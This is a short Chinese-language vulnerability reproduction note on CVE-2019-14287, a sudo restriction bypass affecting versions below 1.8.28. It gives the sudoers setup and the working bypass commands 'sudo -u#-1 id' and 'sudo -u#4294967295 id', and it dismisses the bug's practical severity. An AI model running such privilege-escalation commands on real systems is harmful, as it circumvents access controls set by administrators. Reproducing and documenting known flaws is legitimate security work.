CVE-2019-14287 linux sudo权限提升漏洞

影响范围：sudo版本<1.8.28
漏洞编号：CVE-2019-14287
2019年10月14日，sudo官方发布了CVE-2019-14287漏洞，并更新了sudo 1.8.28版本
该漏洞可以通过sudo -u#[id]，绕过/etc/sudoers中的限制
其中id为-1或者4294967295

复现过程：
命令 sudo -V查看当前版本

修改/etc/sudoers, 添加限制username ALL=(ALL,!root) ALL
使username用户不能以root权限运行所有指令

登陆非root用户
执行sudo id,提示拒绝使用root权限执行id命令

执行sudo -u#-1 id或者sudo -u#4294967295 id

成功绕过限制

该漏洞的利用条件比较苛刻，需要root权限去修改/etc/sudoers，所以比较渣渣